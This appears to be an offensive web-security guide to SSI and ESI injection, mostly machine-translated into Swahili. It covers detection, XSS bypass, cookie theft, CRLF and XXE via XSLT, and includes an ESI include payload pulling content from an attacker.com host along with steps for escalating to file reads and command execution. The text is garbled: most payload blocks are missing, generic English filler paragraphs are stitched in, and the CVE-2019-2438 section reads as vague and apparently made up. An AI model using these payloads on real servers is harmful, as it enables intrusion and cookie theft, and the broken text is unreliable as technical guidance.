Server Side Inclusion/Edge Side Inclusion Injection
Taarifa Msingi za Uingizaji wa Upande wa Seva
(Maelezo yaliyochukuliwa kutoka nyaraka za Apache)
SSI (Uingizaji wa Upande wa Seva) ni maagizo ambayo hupachikwa kwenye kurasa za HTML, na kuhesabiwa kwenye seva wakati kurasa zinahudumiwa. Inakuwezesha kuongeza maudhui yanayozalishwa kwa kudumu kwenye ukurasa wa HTML uliopo, bila kuhudumia ukurasa mzima kupitia programu ya CGI, au teknolojia nyingine ya kudumu. Kwa mfano, unaweza kuweka agizo kwenye ukurasa wa HTML uliopo, kama vile:
<!--#echo var="DATE_LOCAL" -->
Na, wakati ukurasa unahudumiwa, kipande hiki kitahesabiwa na kubadilishwa na thamani yake:
Jumanne, 15-Jan-2013 19:28:54 EST
Uamuzi wa lini kutumia SSI, na lini kuwa na ukurasa wako uliotengenezwa kabisa na programu fulani, kawaida ni suala la sehemu ngapi ya ukurasa ni ya kudumu, na sehemu ngapi inahitaji kuhesabiwa upya kila wakati ukurasa unahudumiwa. SSI ni njia nzuri ya kuongeza vipande vidogo vya habari, kama vile wakati wa sasa - kama inavyoonyeshwa hapo juu. Lakini ikiwa sehemu kubwa ya ukurasa wako inazalishwa wakati unahudumiwa, unahitaji kutafuta suluhisho lingine.
Unaweza kudhani uwepo wa SSI ikiwa programu ya wavuti inatumia faili zenye viendelezi ** .shtml
, .shtm
au .stm
**, lakini sio kila wakati.
Udhihirisho wa kawaida wa SSI una muundo ufuatao:
Angalia
To check for Server-Side Inclusion (SSI) and Edge-Side Inclusion (ESI) Injection vulnerabilities, you can follow these steps:
Identify the target: Determine the target website or application that you want to test for SSI or ESI Injection vulnerabilities.
Inspect the source code: Analyze the source code of the target application to identify any potential SSI or ESI injection points. Look for server-side scripting languages like PHP, ASP, or JSP, as they are commonly used for SSI or ESI.
Test for SSI Injection: Inject SSI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use SSI directives like
<!--#include virtual="file.txt" -->
to include external files or execute commands.Test for ESI Injection: Inject ESI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use ESI directives like
<esi:include src="http://attacker.com/malicious.xml" />
to include external content or execute commands.Observe the response: Analyze the server's response to determine if the injected SSI or ESI directives are executed or if any error messages or unusual behavior occurs.
Exploit the vulnerability: If the SSI or ESI injection is successful, try to exploit the vulnerability further by including sensitive files, executing commands, or accessing restricted areas of the application.
Report and mitigate: Document your findings and report them to the appropriate parties. Provide recommendations on how to mitigate the SSI or ESI Injection vulnerabilities, such as input validation and output encoding.
By following these steps, you can effectively test for and exploit Server-Side Inclusion and Edge-Side Inclusion Injection vulnerabilities in web applications.
Kuingizwa kwa Upande wa Edge
Kuna tatizo la kukusanya habari au programu za kibinafsi kama sehemu ya yaliyomo inaweza kubadilika kwa wakati ujao yaliyomo inapopatikana tena. Hii ndio ESI inatumika, kuonyesha kutumia vitambulisho vya ESI yaliyomo ya kibinafsi inayohitaji kuzalishwa kabla ya kutuma toleo la hifadhi. Ikiwa mshambuliaji anaweza kuingiza kialamishi cha ESI ndani ya yaliyomo ya hifadhi, basi, anaweza kuweza kuingiza yaliyomo yoyote kwenye hati kabla haijatumwa kwa watumiaji.
Uchunguzi wa ESI
Kichwa kinachofuata katika jibu kutoka kwa seva kina maana kuwa seva inatumia ESI:
Ikiwa huwezi kupata kichwa hiki, server inaweza kutumia ESI hata hivyo. Pia inawezekana kutumia njia ya kudhuru kipofu kwa kuwa ombi linapaswa kuwasili kwenye server ya mshambuliaji:
Uchunguzi wa ESI
GoSecure iliumba jedwali ili kuelewa mashambulizi yanayowezekana ambayo tunaweza kujaribu dhidi ya programu tofauti zinazoweza kusaidia ESI, kulingana na kazi inayoungwa mkono:
Includes: Inasaidia agizo la
<esi:includes>
Vars: Inasaidia agizo la
<esi:vars>
. Inatumika kwa kuzunguka Filters za XSSCookie: Vidakuzi vya hati vinapatikana kwa injini ya ESI
Upstream Headers Inahitajika: Programu mbadala hazitaprocess taarifa za ESI isipokuwa programu ya juu inatoa vichwa vya habari
Host Allowlist: Katika kesi hii, ESI inajumuisha inawezekana tu kutoka kwa seva zilizoruhusiwa, ikifanya SSRF, kwa mfano, iwezekane tu dhidi ya seva hizo
Programu | Includes | Vars | Cookies | Upstream Headers Inahitajika | Host Whitelist |
Squid3 | Ndiyo | Ndiyo | Ndiyo | Ndiyo | Hapana |
Varnish Cache | Ndiyo | Hapana | Hapana | Ndiyo | Ndiyo |
Fastly | Ndiyo | Hapana | Hapana | Hapana | Ndiyo |
Akamai ESI Test Server (ETS) | Ndiyo | Ndiyo | Ndiyo | Hapana | Hapana |
NodeJS esi | Ndiyo | Ndiyo | Ndiyo | Hapana | Hapana |
NodeJS nodesi | Ndiyo | Hapana | Hapana | Hapana | Hiari |
XSS
Agizo la ESI lifuatalo litapakia faili yoyote ndani ya jibu la seva
Pita ulinzi wa XSS ya mteja
Description:
Some web applications implement client-side XSS protection mechanisms to prevent the execution of malicious scripts in the browser. These protections are usually implemented using Content Security Policy (CSP) headers or JavaScript libraries like DOMPurify.
However, it is possible to bypass these client-side XSS protections by finding and exploiting vulnerabilities in the server-side code. This can be done by injecting malicious code that will be executed on the server and then reflected back to the client.
Exploitation:
To bypass client XSS protection, you can try the following techniques:
Server-Side Inclusion (SSI) Injection: If the web application uses Server-Side Includes (SSI) to dynamically include content, you can try injecting malicious code into the included file. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
Edge-Side Includes (ESI) Injection: If the web application uses Edge-Side Includes (ESI) to include content from different sources, you can try injecting malicious code into the included content. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
Prevention:
To prevent bypassing client XSS protection, you should:
Implement server-side input validation and sanitization to prevent injection attacks.
Use a web application firewall (WAF) to detect and block malicious requests.
Regularly update and patch the server-side code to fix any vulnerabilities that could be exploited.
Educate developers about secure coding practices and the risks associated with XSS attacks.
Pora Kuki
Pora kuki kwa mbali
Chukua kuki ya HTTP_ONLY kwa kutumia XSS kwa kuirudisha katika jibu:
Faili la Ndani la Binafsi
Usichanganye hii na "Kuingiza Faili la Ndani":
CRLF
CRLF (Carriage Return Line Feed) is a special character sequence that represents the end of a line in various operating systems, including Windows. It consists of two characters: a carriage return (CR) and a line feed (LF).
In the context of web security, CRLF injection refers to a type of attack where an attacker injects CRLF characters into user input fields or HTTP headers to manipulate the behavior of the web application or server. This can lead to various security vulnerabilities, such as HTTP response splitting, session hijacking, or server-side request forgery.
To prevent CRLF injection attacks, it is important to properly validate and sanitize user input, especially when it is used in HTTP headers or other sensitive parts of the application. Additionally, web developers should ensure that the application's response headers are correctly encoded to prevent any unintended interpretation of CRLF characters.
By understanding CRLF injection and implementing appropriate security measures, web applications can be better protected against this type of attack.
Uelekezaji Wazi
Yafuatayo yataongeza kichwa cha Location
kwenye jibu
Ongeza Kichwa
Ongeza kichwa katika ombi lililolazimishwa
Ongeza kichwa katika jibu (inatumika kupita "Content-Type: text/json" katika jibu lenye XSS)
CRLF katika Ongeza kichwa (CVE-2019-2438)
Maelezo
Kuna kosa la CRLF (Carriage Return Line Feed) katika kazi ya kuongeza kichwa kwenye tovuti. Kosa hili linaweza kusababisha mashambulizi ya kuingiza maudhui kwenye kichwa cha ukurasa. Shambulio hili linaweza kusababisha athari mbaya kama vile kuvuja kwa habari nyeti, kutekelezwa kwa msimbo wa JavaScript haramu, au hata kudhibitiwa kwa seva.
Uthibitisho
Ili kuthibitisha uwepo wa kosa hili, unaweza kujaribu kuongeza herufi za CRLF (%0d%0a) kwenye kichwa cha ombi la HTTP. Ikiwa herufi hizo zinaonekana kwenye kichwa cha ukurasa uliopokelewa, basi kuna uwezekano wa kufanya mashambulizi ya CRLF.
Mashambulizi
Mashambulizi ya CRLF yanaweza kufanywa kwa kuingiza maudhui haramu kwenye kichwa cha ukurasa. Hii inaweza kusababisha matokeo mbalimbali kama vile kuvuja kwa habari nyeti, kutekelezwa kwa msimbo wa JavaScript haramu, au hata kudhibitiwa kwa seva.
Kinga
Ili kuzuia mashambulizi ya CRLF, ni muhimu kufanya ukaguzi wa kina wa kuingiza kichwa cha ukurasa. Hakikisha kuondoa herufi za CRLF kutoka kwa data ya kuingiza kabla ya kuionyesha kwenye ukurasa. Pia, tumia vifaa vya usalama kama vile WAF (Web Application Firewall) ili kuzuia mashambulizi ya CRLF.
Akamai kurekebisha
Hii itatuma habari za kurekebisha zilizojumuishwa katika jibu:
ESI + XSLT = XXE
Kwa kutoa thamani ya xslt
kwa parameter ya dca, inawezekana kuweka eXtensible Stylesheet Language Transformations (XSLT)
kulingana na ESI. Uingizaji huo husababisha HTTP surrogate kupata faili za XML na XSLT, ambapo XSLT inachuja XML. Faili za XML kama hizo zinaweza kutumiwa kwa mashambulizi ya XML External Entity (XXE), kuruhusu wadukuzi kutekeleza mashambulizi ya SSRF. Hata hivyo, matumizi ya njia hii ni mdogo kwani ESI tayari inatumika kama vector ya SSRF. Kutokana na ukosefu wa msaada katika maktaba ya Xalan, DTD za nje hazipangwi, hivyo kuzuia uchimbaji wa faili za ndani.
Faili la XSLT:
Angalia ukurasa wa XSLT:
pageXSLT Server Side Injection (Extensible Stylesheet Language Transformations)Marejeo
Orodha ya Uchunguzi wa Brute-Force
Last updated